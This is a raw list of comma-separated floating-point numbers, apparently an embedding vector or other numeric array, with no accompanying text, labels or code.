-0.004965093918144703, -0.023664748296141624, -0.03680147975683212, -0.003728673094883561, 0.03472071886062622, 0.0009976772125810385, -0.016754766926169395, -0.008338563144207, 0.030528146773576736, -0.03714309632778168, 0.0042275115847587585, 0.0026514146011322737, -0.014767175540328026, -0.02239144779741764, -0.005318357143551111, -0.01869577169418335, 0.04096299782395363, -0.03472071886062622, -0.024860408157110214, 0.00031420038430951536, 0.005539631936699152, -0.016133643686771393, -0.020077768713235855, 0.0485096275806427, -0.012437968514859676, 0.018851052969694138, 0.023509467020630836, -0.03217412158846855, -0.007892131805419922, -0.02981385588645935, -0.048168011009693146, 0.04111827537417412, -0.01683240570127964, -0.05496929585933685, 0.009588571265339851, -0.012888281606137753, 0.05537302792072296, -0.010403793305158615, 0.0029212143272161484, -0.0097283236682415, -0.05661527067422867, 0.001786696258932352, 0.008625831454992294, 0.015411590225994587, -0.02318337932229042, 0.025792092084884644, 0.05040404945611954, -0.011219016276299953, -0.034938111901283264, -0.023633692413568497, 0.01053578220307827, 0.026009483262896538, -0.03378903865814209, -0.054130781441926956, -0.0021312248427420855, 0.02586973085999489, 0.049751874059438705, -0.024689599871635437, 0.02360263653099537, -0.017313776537775993, 0.011568397283554077, 0.030248641967773438, 0.014697299338877201, -0.04760900139808655, 0.04093194007873535, 0.01748458482325077, 0.022360391914844513, -0.018726827576756477, -0.010978331789374352, -0.021801382303237915, 0.033074747771024704, 0.03273313120007515, -0.009448818862438202, -0.011459700763225555, -0.08024896681308746, -0.005586216226220131, 0.0032414805609732866, -0.023540524765849113, -0.012305979616940022, -0.004014000762254, 0.016925575211644173, 0.0025834792759269476, -0.020186465233564377, 0.008462787605822086, -0.009635155089199543, -0.006696471478790045, -0.00814446248114109, 0.0020652306266129017, 0.047112103551626205, -0.0010073822923004627, -0.01319884229451418, -0.026087123900651932, -0.04251580312848091, -0.01656842976808548, -0.010023356415331364, -0.005143666639924049, 0.04437916725873947, -0.00981372781097889, 0.014658479019999504, 0.011358768679201603, -0.012049767188727856, 0.020217521116137505, 0.00788824912160635, -0.016382092610001564, 0.02555917017161846, 0.017453528940677643, 0.009091673418879509, -0.009596334770321846, -0.04068349301815033, 0.0050155604258179665, -0.05264009162783623, -0.015295129269361496, -0.004522544797509909, -0.03170827776193619, -0.030108889564871788, 0.012795113027095795, 0.0002033204073086381, 0.007612626533955336, -0.01987590454518795, 0.045372962951660156, -0.037018872797489166, -0.05835441127419472, 0.017034271731972694, 0.03543500974774361, -0.00015406736929435283, -0.0280747152864933, 0.021102620288729668, -0.024223757907748222, 0.016413148492574692, 0.014441086910665035, 0.043292202055454254, 0.01748458482325077, -0.04173940047621727, -0.03232939913868904, -0.01830757036805153, 0.0455903559923172, -0.00209046364761889, -0.014107233844697475, -0.005058262497186661, -0.004984504077583551, -0.04509345814585686, 0.0046661789529025555, 0.009503167122602463, -0.0011519872350618243, 0.00875005591660738, 0.034782830625772476, 0.05052827671170235, 0.009976772591471672, -0.009976772591471672, 0.0210560355335474, 0.020481498911976814, -0.0400313138961792, 0.009021797217428684, 0.019906960427761078, -0.019239254295825958, -0.021102620288729668, -0.021242372691631317, 0.010310625657439232, 0.04335431754589081, 0.036521974951028824, -0.035062335431575775, -0.0014858403010293841, 0.03763999417424202, -0.007278773467987776, -0.02597842738032341, -0.026009483262896538, -0.010962803848087788, 0.024969104677438736, 0.0040023550391197205, 0.010186401195824146, 0.05736061558127403, 0.006389792542904615, 0.01211964339017868, -0.04866490885615349, -0.014674006961286068, -0.008167753927409649, 0.015225253067910671, -0.02849397249519825, -0.00278534390963614, 0.011296656914055347, -0.05835441127419472, -0.0155668705701828, 0.0003406465984880924, 0.005027206148952246, 0.031087156385183334, 0.009580806829035282, -0.00080745859304443, 0.013804436661303043, -0.0008875250932760537, -0.03444121405482292, -0.04590091481804848, 0.03298157826066017, -0.04506240040063858, -0.0010035001905635, 0.0274535920470953, 0.010559073649346828, -0.02729831263422966, -0.04332325980067253, 0.0034821652807295322, 0.03509339317679405, -0.007903777062892914, -0.004297387786209583, -0.02917720563709736, -0.049099694937467575, -0.025481529533863068, -0.010194164700806141, 0.00015612969582434744, -0.013757852837443352, -0.006230629980564117, -0.02504674531519413, 0.010753174312412739, -0.003204601351171732, 0.0037131449207663536, 0.0365530289709568, 0.020341746509075165, -0.03236045688390732, 0.025605754926800728, -0.009782671928405762, -0.0035714516416192055, 0.026009483262896538, -0.026428740471601486, -0.015613454394042492, 0.00836185459047556, -0.01708085462450981, -0.04863385483622551, 0.0029949727468192577, -0.02226722426712513, -0.00786107499152422, -0.0012199224438518286, 0.015481466427445412, 0.03618035838007927, -0.021397653967142105, 0.01934795081615448, 0.027934962883591652, -0.01788831315934658, 0.001255831099115312, -0.021785853430628777, -0.0021331659518182278, 0.02798154577612877, 0.000893348129466176, 0.007162312977015972, 0.02184796705842018, 0.03204989433288574, -0.007022560574114323, -0.058758143335580826, -0.03602507710456848, -0.015069972723722458, 0.016071531921625137, 0.0028765713796019554, -0.026413213461637497, -0.015854138880968094, -0.009169314056634903, -0.0021991601679474115, 0.02860266901552677, -0.0514289028942585, 0.014324625954031944, 0.001137429615482688, -0.008074586279690266, -0.020341746509075165, -0.022686481475830078, 0.057081110775470734, -0.00656060129404068, 0.05978299304842949, -0.024829352274537086, 0.0238355565816164, -0.033882204443216324, -0.013897605240345001, -0.005986063275486231, 0.0046661789529025555, -0.01644420437514782, 0.015341713093221188, 0.030310753732919693, -0.034006427973508835, 0.0286337248980999, 0.02981385588645935, -0.03232939913868904, 0.006735291797667742, -0.0028940404299646616, -0.004883571993559599, -0.0336337573826313, -0.004553600680083036, -0.046584151685237885, -0.010256277397274971, -0.009076145477592945, 0.07037312537431717, -0.019565343856811523, -0.025357306003570557, 0.030559202656149864, -0.03323002904653549, 0.01120348833501339, -0.009712795726954937, 0.016351036727428436, -0.04925497621297836, -0.003689853008836508, 0.011987654492259026, -0.03114926815032959, -0.02145976573228836, 0.03897540643811226, 0.02822999469935894, 0.0032608904875814915, 0.014534254558384418, -0.020776530727744102, 0.0024883700534701347, 0.004576892592012882, 0.00758933462202549, 0.017546696588397026, -0.01492245588451624, -0.032422568649053574, -0.01897527649998665, -0.010450378060340881, -0.0027465238235890865, 0.02956540696322918, 0.024441150948405266, -0.01618022844195366, 0.016475262120366096, 0.00895192101597786, 0.03048156201839447, 0.0453108511865139, -0.0009491520468145609, -0.008501606993377209, -0.012841697782278061, 0.0508698932826519, 0.012608776800334454, -0.024425622075796127, 0.011319948360323906, 0.004576892592012882, -0.027484647929668427, 0.004712763242423534, -0.00314637110568583, 0.010993859730660915, 0.027500176802277565, 0.020574666559696198, 0.0061491080559790134, -0.03580768406391144, -0.004716645460575819, -0.0643482431769371, -0.017826201394200325, 0.00706138089299202, -0.008299742825329304, 0.03524867445230484, 0.02582314796745777, -0.033975373953580856, -0.005912305321544409, 0.018462851643562317, 0.0003518073935993016, 0.001526601379737258, 0.011071499437093735, 0.04742266610264778, -0.013074617832899094, -0.008563719689846039, 0.011420880444347858, -0.03751577064394951, 0.01830757036805153, 0.022220639511942863, -0.00875782035291195, 0.021677158772945404, -0.020900756120681763, 0.00855595525354147, -0.00967397540807724, -0.029487766325473785, 0.010760938748717308, 0.039161741733551025, -0.009526458568871021, -0.03496916964650154, -0.0012820346746593714, -0.009860311634838581, -0.002748464932665229, 0.04242263361811638, 0.023354187607765198, 0.01378890872001648, -0.034379102289676666, 0.0020399976056069136, 0.005722086410969496, 0.01934795081615448, -0.02913062274456024, 0.0535096600651741, -0.0405903235077858, 0.012523372657597065, 0.08441048115491867, -0.014596367254853249, -0.024347983300685883, 0.0169566310942173, -0.025124385952949524, 0.007065262645483017, -0.009394470602273941, -0.05552830547094345, -0.035714514553546906, 0.03487600013613701, 0.006086995825171471, -0.002226334298029542, -0.02360263653099537, -0.011653801426291466, 0.005854074843227863, 0.019192669540643692, -0.01312120258808136, -0.025403890758752823, 0.03223623335361481, -0.05540408194065094, 0.004934038035571575, 0.02520202472805977, -0.06273332238197327, -0.002434021793305874, -0.02624240517616272, -0.004996150266379118, -0.016071531921625137, 0.012833933345973492, 0.03060578741133213, 0.027375953271985054, 0.025667866691946983, -0.016009420156478882, 0.006331562530249357, 0.00003630288119893521, 0.03751577064394951, 0.029394598677754402, 0.02462748810648918, 0.010225220583379269, 0.006067585665732622, 0.01619575545191765, -0.01465071551501751, -0.004623476881533861, -0.024611959233880043, 0.02970515936613083, 0.0169566310942173, -0.010644478723406792, -0.0004250803613103926, -0.020062241703271866, -0.00035641726572066545, -0.004549718461930752, 0.0072748917154967785, 0.007523340173065662, 0.02930143103003502, -0.005058262497186661, 0.021118147298693657, -0.012135171331465244, 0.008882044814527035, -0.003685970790684223, 0.01277958508580923, 0.02304362691938877, 0.014278042130172253, 0.017795145511627197, 0.012492316775023937, 0.004965093918144703, 0.022096415981650352, 0.013633628375828266, -0.005850193090736866, -0.002247685333713889, 0.011630509980022907, 0.0149768041446805, 0.013206606730818748, 0.005256244912743568, 0.020854171365499496, 0.04291953146457672, -0.016537373885512352, 0.017686448991298676, 0.006385910790413618, 0.003355999942868948, -0.008928628638386726, -0.04680154472589493, -0.0033831738401204348, 0.013889840804040432, -0.013517167419195175, -0.006746937986463308, -0.01239914819598198, -0.014006300829350948, 0.00236802757717669, 0.0026533554773777723, 0.019021861255168915, 0.008998504839837551, 0.0019380947342142463, 0.022872818633913994, -0.018074650317430496, -0.006319916341453791, -0.0005488195456564426, -0.015264073386788368, -0.0011316066375002265, -0.015155376866459846, -0.0255746990442276, -0.016475262120366096, 0.0022981513757258654, 0.003208483336493373, -0.001694498467259109, 0.0021991601679474115, 0.0036976169794797897, 0.035186562687158585, 0.007795081008225679, -0.005974417086690664, 0.023121267557144165, 0.051366791129112244, -0.0033695867750793695, 0.003179368330165744, 0.004456550348550081, 0.04136672616004944, -0.021925607696175575, -0.024611959233880043, 0.03428593650460243, -0.022639896720647812, -0.0017634042305871844, -0.012189519591629505, 0.029487766325473785, 0.019984601065516472, 0.021956663578748703, 0.06257804483175278, -0.019161613658070564, -0.01359480805695057, -0.008066821843385696, 0.014681771397590637, -0.005667738150805235, 0.012942629866302013, -0.006040411535650492, 0.058230187743902206, -0.027236200869083405, 0.026677189394831657, 0.017997009679675102, -0.013323066756129265, 0.013757852837443352, 0.015248545445501804, -0.02437903918325901, -0.00788824912160635, -0.005691030528396368, -0.03032628260552883, -0.0013189137680456042, -0.01586190238595009, -0.04972081631422043, 0.01542711816728115, 0.015683330595493317, 0.0007443759241141379, -0.005869602784514427, 0.008594775572419167, -0.03642880544066429, -0.0011539282277226448, -0.013610335998237133, 0.003765552071854472, 0.01027956884354353, -0.005920069292187691, -0.015947308391332626, 0.009254718199372292, 0.07316817343235016, 0.0007351561216637492, -0.0006977917510084808, -0.012934865429997444, -0.014906927943229675, -0.013773380778729916, 0.025077801197767258, -0.0044332584366202354, -0.013423999771475792, 0.01465071551501751, 0.026071596890687943, 0.00922366138547659, 0.010388265363872051, -0.037329431623220444, 0.0019351833034306765, 0.018835524097085, -0.0197361521422863, 0.007271009497344494, -0.0065256631933152676, -0.030124416574835777, -0.009177077561616898, 0.001903156633488834, 0.034534383565187454, 0.01378114428371191, -0.016009420156478882, -0.00847831554710865, -0.004790403414517641, -0.025481529533863068, -0.001196630415506661, 0.03263996168971062, -0.0032356574665755033, -0.028167882934212685, -0.0027329367585480213, -0.0005095141241326928, -0.005912305321544409, 0.019674040377140045, 0.0019681802950799465, 0.02450326271355152, -0.002987208543345332, -0.00914602167904377, 0.009650683030486107, 0.011087027378380299, -0.023618163540959358, -0.0002047761663561687, -0.002874630270525813, 0.002255449304357171, 0.04139778017997742, 0.006013237405568361, 0.013656919822096825, -0.0072748917154967785, 0.018524963408708572, -0.011288892477750778, -0.027360424399375916, -0.027764152735471725, -0.004596302751451731, -0.02812129817903042, -0.018742356449365616, -0.0000949273380683735, -0.0023874377366155386, 0.01725166290998459, 0.008051293902099133, 0.0197361521422863, 0.02107156440615654, -0.007018678821623325, 0.014611895196139812, -0.006370382383465767, 0.005166958551853895, -0.03602507710456848, -0.024472206830978394, -0.009922424331307411, 0.007259363308548927, -0.022872818633913994, 0.0019322717562317848, -0.036397747695446014, -0.0008719970937818289, -0.0157764982432127, -0.020978394895792007, 0.025885259732604027, -0.01125783659517765, 0.027329368516802788, 0.005007795989513397, 0.014774939976632595, 0.014937983825802803, -0.0455903559923172, 0.017997009679675102, -0.008656888268887997, 0.0029600346460938454, -0.05152206867933273, 0.026009483262896538, -0.019316894933581352, 0.00659942114725709, -0.021708214655518532, 0.016537373885512352, -0.0020419384818524122, 0.01922372542321682, -0.0172361359000206, -0.0012500080047175288, 0.01067553460597992, -0.029363542795181274, -0.062484875321388245, 0.005741496570408344, 0.0033152387477457523, 0.02069889008998871, 0.0007317593554034829, -0.017795145511627197, -0.02237592078745365, -0.01840073987841606, -0.02093181200325489, 0.022438032552599907, 0.011265600100159645, -0.011490756645798683, -0.012282687239348888, -0.010939511470496655, -0.029907025396823883, -0.0026203584857285023, -0.014728355221450329, 0.00758933462202549, 0.02877347730100155, 0.016785822808742523, 0.02254672907292843, -0.016754766926169395, 0.018074650317430496, 0.03156852722167969, 0.015978364273905754, 0.004953448195010424, -0.03605613112449646, 0.023152323439717293, -0.010232985019683838, 0.010683298110961914, -0.004184809513390064, -0.001510102883912623, -0.014697299338877201, 0.013292010873556137, 0.009681738913059235, -0.03428593650460243, -0.009495402686297894, 0.026459798216819763, 0.00612581567838788, -0.004732173401862383, -0.022484617307782173, -0.015217489562928677, 0.023618163540959358, -0.003225952386856079, -0.0482301227748394, -0.03562134876847267, -0.008990741334855556, 0.013687976635992527, 0.017997009679675102, -0.04363382235169411, 0.004747701343148947, 0.012764057144522667, 0.02107156440615654, 0.0033191207330673933, 0.024565374478697777, 0.03763999417424202, -0.023416299372911453, 0.014604130759835243, -0.026615077629685402, 0.03229834511876106, 0.009914659895002842, 0.0013800554443150759, -0.03658408671617508, 0.03217412158846855, -0.01840073987841606, 0.02332313172519207, -0.00266888365149498, 0.00019507113029249012, 0.012500080280005932, 0.023928726091980934, -0.00922366138547659, -0.0031191969756036997, -0.007220543455332518, 0.02145976573228836, -0.0033831738401204348, -0.008998504839837551, -0.011156903579831123, -0.03723626583814621, 0.021288957446813583, -0.011653801426291466, 0.029611991718411446, -0.017298247665166855, 0.023261019960045815, -0.012624304741621017, -0.03568346053361893, -0.02981385588645935, -0.015745442360639572, -0.05164629593491554, -0.0060714674182236195, -0.0029270374216139317, -0.0053688231855630875, 0.013416235335171223, -0.029782800003886223, 0.0017109970794990659, -0.00809011422097683, -0.010481433942914009, -0.015675567090511322, -0.01523301750421524, -0.0014547841856256127, -0.032919466495513916, -0.009014032781124115, -0.02017093636095524, -0.010155344381928444, 0.016118116676807404, 0.01339294295758009, 0.024285869672894478, 0.04012448340654373, 0.04888230189681053, -0.026475325226783752, -0.015147613361477852, -0.009650683030486107, -0.027997074648737907, -0.011653801426291466, -0.013555987738072872, -0.01948770321905613, -0.03645986318588257, 0.015434881672263145, -0.018866581842303276, 0.02015540935099125, -0.03832322731614113, -0.01059013046324253, -0.027469120919704437, -0.014433322474360466, -0.026537436991930008, -0.027065390720963478, -0.020388329401612282, 0.00038359136669896543, -0.010993859730660915, -0.014774939976632595, 0.0004078539495822042, 0.018602604046463966, 0.0018672479782253504, 0.014355682767927647, -0.03037286549806595, -0.015419353730976582, 0.0013412353582680225, -0.02184796705842018, -0.0038179592229425907, 0.009254718199372292, -0.005993827246129513, 0.015931779518723488, 0.0019584752153605223, -0.03208095207810402, -0.026739303022623062, 0.0018187229288741946, 0.04664626345038414, -0.02768651396036148, -0.05205002427101135, 0.01947217434644699, 0.008400674909353256, -0.015621218830347061, -0.00708855502307415, -0.002067171735689044, -0.024705126881599426, -0.011125847697257996, -0.015496994368731976, 0.006195691879838705, 0.015403825789690018, -0.015962835401296616, 0.021925607696175575, 0.01920819841325283, -0.004619595129042864, 0.0039635347202420235, 0.018074650317430496, 0.004611830692738295, -0.0016741178696975112, 0.0026960577815771103, -0.060528337955474854, 0.007911541499197483, -0.02290387451648712, -0.05478296056389809, 0.03462755307555199, -0.008408439345657825, 0.005485283676534891, -0.014906927943229675, 0.01614917255938053, -0.004848633427172899, -0.010310625657439232, 0.008975213393568993, -0.018649188801646233, -0.032422568649053574, -0.0024922520387917757, -0.0100078284740448, -0.01192554272711277, 0.0017139085102826357, 0.0041226972825825214, 0.015683330595493317, 0.011288892477750778, -0.008307507261633873, -0.006669297348707914, 0.009192605502903461, 0.014743883162736893, 0.017174024134874344, -0.04493817687034607, 0.022888345643877983, 0.010481433942914009, 0.01359480805695057, -0.014464378356933594, 0.03366481140255928, 0.0013858784222975373, 0.020434914156794548, 0.022748593240976334, 0.0032705955673009157, -0.024844881147146225, -0.011382061056792736, 0.004483724478632212, -0.01672370918095112, -0.02068336308002472, 0.026615077629685402, 0.04164623096585274, -0.019534287974238396, 0.012795113027095795, -0.006021001376211643, 0.008237631060183048, -0.020916283130645752, -0.002711585722863674, -0.022453561425209045, -0.020434914156794548, -0.013284246437251568, -0.016257869079709053, -0.020497025921940804, 0.009705031290650368, -0.0202951617538929, 0.006195691879838705, -0.0026960577815771103, -0.010481433942914009, -0.008726764470338821, 0.005927833262830973, -0.02663060650229454, 0.015085500665009022, -0.0024417859967797995, -0.008990741334855556, -0.025807619094848633, -0.019254781305789948, 0.02490699291229248, 0.0052873012609779835, 0.015271836891770363, 0.01059013046324253, -0.0008525869925506413, -0.043292202055454254, -0.0008482197299599648, 0.025341777130961418, 0.0015702741220593452, 0.010217457078397274, 0.004829223733395338, -0.017997009679675102, 0.004037293139845133, -0.035310786217451096, 0.021273428574204445, 0.012437968514859676, -0.016801349818706512, -0.010970567353069782, -0.027080919593572617, 0.0013946129474788904, -0.06720539927482605, 0.03020205721259117, 0.023959781974554062, -0.015318421646952629, 0.02968963235616684, 0.006106405518949032, -0.010015591979026794, 0.030139945447444916, -0.017267191782593727, 0.01378114428371191, 0.0012480670120567083, 0.016537373885512352, 0.014852579683065414, -0.010830814950168133, -0.014378974214196205, 0.049223918467760086, -0.01498456858098507, -0.01711191050708294, 0.013346359133720398, 0.051366791129112244, -0.02821446768939495, 0.007558278273791075, -0.003982944879680872, -0.011956598609685898, 0.005155312828719616, 0.013478347100317478, -0.041801512241363525, 0.020838642492890358, 0.026025012135505676, -0.0033501768484711647, 0.00245149084366858, 0.01655290089547634, 0.008183282800018787, -0.00589289516210556, 0.012764057144522667, -0.007919305935502052, 0.004720527213066816, -0.015962835401296616, -0.026273461058735847, 0.03260890394449234, 0.029363542795181274, 0.0041537536308169365, -0.006156872026622295, -0.019984601065516472, -0.019021861255168915, -0.012632069177925587, -0.006207338068634272, 0.007670856546610594, 0.02265542559325695, -0.009386706165969372, -0.0069565665908157825, 0.027857322245836258, 0.03509339317679405, 0.0008419114747084677, -0.012305979616940022, 0.003986827097833157, 0.00010523893433855847, -0.02187902294099331, -0.004239157773554325, -0.0025291312485933304, 0.008183282800018787, -0.01350940391421318, -0.0005177634302526712, -0.012166227214038372, 0.00008940760017139837, -0.016382092610001564, -0.0024631370324641466, 0.009767143987119198, 0.014045121148228645, 0.005885131191462278, -0.004689471330493689, 0.005815254990011454, -0.009347885847091675, -0.006067585665732622, 0.015559106133878231, -0.024161646142601967, -0.018726827576756477, -0.010722118429839611, -0.029736215248703957, 0.006789640057832003, 0.009984536096453667, -0.013128966093063354, -0.000864233064930886, 0.018462851643562317, -0.018493907526135445, -0.010100997053086758, -0.011250072158873081, -0.002255449304357171, 0.010628950782120228, -0.01670818217098713, -0.019006334245204926, -0.01922372542321682, -0.025264138355851173, 0.023959781974554062, -0.017701977863907814, -0.0149768041446805, 0.01008546818047762, 0.023882141336798668, -0.003132784040644765, -0.03816794604063034, -0.0062616863287985325, -0.018524963408708572, -0.00506990822032094, 0.004646768793463707, 0.011653801426291466, 0.008579247631132603, 0.0072748917154967785, -0.005555159877985716, 0.012430204078555107, 0.028059186413884163, 0.015737678855657578, -0.0019235372310504317, 0.019239254295825958, 0.001100550522096455, 0.009052853100001812, 0.01425474975258112, -0.001138400170020759, 0.013354123570024967, 0.00732147553935647, 0.01059013046324253, -0.012243867851793766, -0.004852515645325184, -0.005803608801215887, -0.0043866741470992565, -0.00927800964564085, -0.014021829701960087, -0.002204983029514551, -0.0031405482441186905, -0.002364145591855049, -0.03341636434197426, 0.0077873170375823975, -0.009961243718862534, 0.03195672854781151, 0.000030434372092713602, 0.0006264597759582102, -0.009161549620330334, -0.017065327614545822, -0.00005125469760969281, 0.00875782035291195, 0.004281859844923019, 0.01736035943031311, 0.014278042130172253, -0.01590072363615036, 0.01684793457388878, 0.00928577408194542, 0.000271013006567955, -0.011708149686455727, -0.01656842976808548, -0.003949947655200958, -0.014852579683065414, 0.012515608221292496, -0.0066925897262990475, -0.020854171365499496, -0.040466099977493286, 0.011467465199530125, -0.017406944185495377, 0.009681738913059235, 0.000269799871603027, -0.00706138089299202, 0.01066777016967535, 0.030124416574835777, 0.0036005666479468346, 0.025108857080340385, -0.021242372691631317, 0.022764122113585472, -0.01264759711921215, 0.04130461439490318, -0.008843224495649338, 0.019456647336483, 0.0062616863287985325, 0.009790435433387756, 0.025807619094848633, -0.011778025887906551, 0.004134343471378088, 0.01975167915225029, 0.0071234931237995625, -0.011436409316956997, -0.033571645617485046, 0.021801382303237915, -0.029099566861987114, 0.01684793457388878, 0.010248512960970402, 0.04177045449614525, -0.008268686942756176, -0.05000032112002373, 0.014619659632444382, -0.01908397302031517, -0.00842396728694439, 0.009254718199372292, 0.0027271138969808817, -0.020993923768401146, -0.012678653001785278, 0.02701880782842636, -0.021288957446813583, -0.0040838769637048244, -0.012694180943071842, -0.01801253855228424, -0.009697266854345798, 0.0037461421452462673, 0.010628950782120228, -0.03009336069226265, 0.020233049988746643, 0.02624240517616272, 0.026288988068699837, 0.02624240517616272, 0.0007778582512401044, 0.015132084488868713, -0.014860344119369984, 0.01517090480774641, -0.005147548392415047, -0.03403748571872711, -0.019021861255168915, -0.004906863905489445, -0.019658511504530907, -0.0010995800839737058, -0.004173163324594498, 0.004270213656127453, -0.01172367762774229, -0.022717537358403206, 0.008105642162263393, -0.03670831024646759, 0.02650638110935688, 0.00645966874435544, -0.011234544217586517, -0.008594775572419167, 0.026661662384867668, -0.00589289516210556, 0.008633595891296864, -0.009549750946462154, 0.0032278934959322214, -0.0012451554648578167, 0.013812200166285038, 0.014914692379534245, 0.010046648792922497, -0.015396061353385448, -0.0031308431643992662, 0.004409966059029102, -0.017127439379692078, 0.05006243288516998, 0.013012506067752838, -0.005857957061380148, 0.03723626583814621, -0.011382061056792736, -0.002789225894957781, 0.0056716203689575195, 0.028680307790637016, 0.013757852837443352, 0.003439463209360838, -0.010295096784830093, -0.002317561535164714, 0.0009389618062414229, 0.011972126550972462, -0.004111051093786955, 0.020248576998710632, 0.01897527649998665, -0.02228275127708912, 0.006040411535650492, -0.00005574327224167064, 0.006638241466134787, 0.017686448991298676, -0.03950335830450058, -0.017391415312886238, 0.01273300126194954, 0.014378974214196205, -0.019642982631921768, -0.016785822808742523, -0.0017148790648207068, 0.014021829701960087, -0.006005473434925079, -0.014068413525819778, 0.016242340207099915, 0.028183411806821823, 0.0004956844495609403, 0.007158431224524975, 0.03236045688390732, 0.005854074843227863, -0.023167850449681282, 0.007709676865488291, 0.00028969519189558923, -0.026149235665798187, -0.022096415981650352, -0.016661597415804863, -0.023820029571652412, 0.008152225986123085, 0.004017882980406284, -0.023292075842618942, 0.01145193725824356, 0.00197400338947773, 0.011234544217586517, -0.018462851643562317, -0.010124288499355316, -0.014083941467106342, 0.010015591979026794, 0.011382061056792736, -0.022872818633913994, 0.020574666559696198, -0.021366596221923828, -0.0022573901806026697, -0.022717537358403206, 0.0017478761728852987, -0.0051359026692807674, -0.006316034588962793, -0.024984633550047874, 0.00278534390963614, -0.01173144206404686, -0.002086581662297249, 0.015194197185337543, 0.02545047365128994, -0.0368325337767601, -0.016910046339035034, 0.00947987474501133, 0.014573074877262115, -0.0010617304360494018, -0.012018710374832153, -0.02240697667002678, -0.013004741631448269, 0.009184841997921467, 0.006440258584916592, 0.04139778017997742, -0.007104082964360714, -0.011878957971930504, 0.002965857507660985, -0.010318389162421227, 0.011358768679201603, -0.027624400332570076, -0.007496166042983532, -0.01545040961354971, -0.005392115563154221, -0.01922372542321682, 0.0031580172944813967, -0.010931747034192085, 0.007457346189767122, 0.00808234978467226, -0.010450378060340881, -0.0017721387557685375, 0.010302861221134663, -0.0035869795829057693, -0.003804372390732169, 0.01517866924405098, -0.018369683995842934, 0.016413148492574692, -0.022717537358403206, -0.00035932878381572664, 0.008323035202920437, 0.03220517560839653, 0.01094727497547865, 0.017406944185495377, -0.018385211005806923, -0.0011510166805237532, 0.019969072192907333, -0.0029755625873804092, -0.007278773467987776, -0.02518649771809578, -0.0241150613874197, -0.0007322446326725185, 0.02675483003258705, -0.02172374166548252, 0.014518726617097855, -0.025264138355851173, -0.0065256631933152676, -0.002104050712659955, -0.01411499734967947, 0.022826233878731728, -0.002538836095482111, 0.01344729121774435, 0.002049702685326338, 0.00065460434416309, -0.010287333279848099, 0.021413180977106094, -0.005194132681936026, 0.021832438185811043, -0.007884367369115353, -0.01014758087694645, 0.00045468073221854866, -0.004844751674681902, 0.0009632243891246617, 0.00008334195445058867, 0.016941102221608162, 0.012577720917761326, -0.026552965864539146, -0.028167882934212685, -0.02754676155745983, 0.00261841737665236, -0.017158495262265205, -0.0065334271639585495, -0.004417730495333672, -0.014192637987434864, -0.010807522572577, 0.020761003717780113, -0.014728355221450329, 0.016537373885512352, 0.00306290783919394, 0.0218945499509573, -0.008260922506451607, 0.013866548426449299, 0.0035753336269408464, -0.008136698044836521, -0.010465906001627445, 0.01777961663901806, 0.008788876235485077, 0.00748840207234025, -0.020465970039367676, 0.012608776800334454, 0.00966621097177267, -0.015621218830347061, -0.028261050581932068, -0.007441818248480558, -0.003722850000485778, -0.0016741178696975112, 0.01233703549951315, -0.0012082763714715838, -0.0055590420961380005, 0.012911573983728886, -0.015333949588239193, 0.006017119623720646, -0.004848633427172899, 0.020978394895792007, 0.0397518090903759, -0.011552869342267513, -0.007849429734051228, -0.03431699052453041, -0.020497025921940804, 0.02281070500612259, -0.016087060794234276, -0.012849461287260056, -0.021366596221923828, 0.014534254558384418, -0.0013519108761101961, 0.014021829701960087, -0.005302829202264547, -0.004650651011615992, 0.011956598609685898, -0.022453561425209045, 0.014246986247599125, 0.0012354505015537143, -0.00016122483066283166, -0.021941134706139565, -0.01841626688838005, 0.03866484388709068, -0.001861425000242889, 0.018462851643562317, 0.04773322492837906, -0.006995386444032192, 0.000023185926693258807, -0.03763999417424202, 0.0004347854119259864, -0.035310786217451096, -0.03869590163230896, -0.019705096259713173, -0.015302893705666065, 0.021164732053875923, 0.020838642492890358, 0.02638215757906437, 0.01892869360744953, -0.0036025075241923332, 0.022733066231012344, 0.005733732599765062, 0.003460814245045185, -0.024860408157110214, -0.009697266854345798, 0.0182765144854784, 0.010768703185021877, -0.006424730643630028, 0.007849429734051228, 0.02414611726999283, 0.01583084650337696, -0.026568492874503136, 0.0037597292102873325, -0.011677093803882599, -0.011482993140816689, 0.011211251839995384, 0.00002277649582538288, -0.00045734961167909205, 0.01430909801274538, -0.04363382235169411, -0.011079263873398304, 0.01277958508580923, 0.009782671928405762, 0.01583084650337696, 0.020869700238108635, -0.03125796467065811, 0.005784198641777039, 0.017406944185495377, -0.015155376866459846, 0.0038567795418202877, -0.0086180679500103, 0.009557514451444149, -0.0043866741470992565, 0.04279530793428421, -0.016226813197135925, 0.04186362400650978, 0.020326217636466026, -0.014891400001943111, 0.017267191782593727, -0.010597893968224525, -0.011607217602431774, 0.0027290547732263803, 0.019021861255168915, -0.011910014785826206, -0.009573043324053288, 0.01092398352921009, 0.00026058009825646877, -0.014246986247599125, -0.024084005504846573, -0.017438000068068504, 0.00658777542412281, 0.0066071851179003716, 0.010683298110961914, 0.003154135076329112, -0.01683240570127964, -0.02013988047838211, 0.009774907492101192, -0.024596432223916054, 0.03422382101416588, -0.0007749467622488737, 0.0017100265249609947, -0.006370382383465767, 0.0007351561216637492, -0.001652766834013164, -0.011677093803882599, 0.01683240570127964, -0.02374238893389702, -0.002439844887703657, -0.01153734140098095, 0.00557068781927228, -0.02425481379032135, -0.012476787902414799, 0.0013373533729463816, 0.0040838769637048244, -0.0028047540690749884, -0.006514017004519701, -0.02996913716197014, -0.016335507854819298, -0.02158398926258087, 0.00035447627305984497, -0.011816846206784248, -0.005372705403715372, -0.007119610905647278, 0.007406880147755146, -0.0026203584857285023, 0.011902250349521637, 0.007833900861442089, 0.007224425207823515, -0.0029775036964565516, -0.01384325698018074, -0.024223757907748222, -0.014534254558384418, 0.008152225986123085, -0.0013111496809870005, 0.015442646108567715, 0.007003150414675474, -0.005073790438473225, 0.010295096784830093, -0.007837783545255661, 0.007713559083640575, -0.003237598342821002, 0.0025679513346403837, 0.012833933345973492, 0.005659974180161953, 0.016413148492574692, -0.006680943537503481, 0.04282636195421219, -0.025015689432621002, -0.01344729121774435, -0.0003886865160893649, 0.013128966093063354, 0.01936347782611847, 0.012010946869850159, -0.0034336401149630547, 0.010691062547266483, -0.013555987738072872, -0.00523683475330472, -0.005881248973309994, -0.0035287493374198675, -0.013967481441795826, 0.000387958629289642, 0.00643249461427331, 0.01008546818047762, 0.031242437660694122, 0.00013320155267138034, -0.007383587770164013, -0.0009452700614929199, 0.011878957971930504, 0.02172374166548252, -0.022189583629369736, -0.004720527213066816, -0.0038645435124635696, -0.005935597233474255, -0.01178579032421112, -0.010978331789374352, 0.017174024134874344, 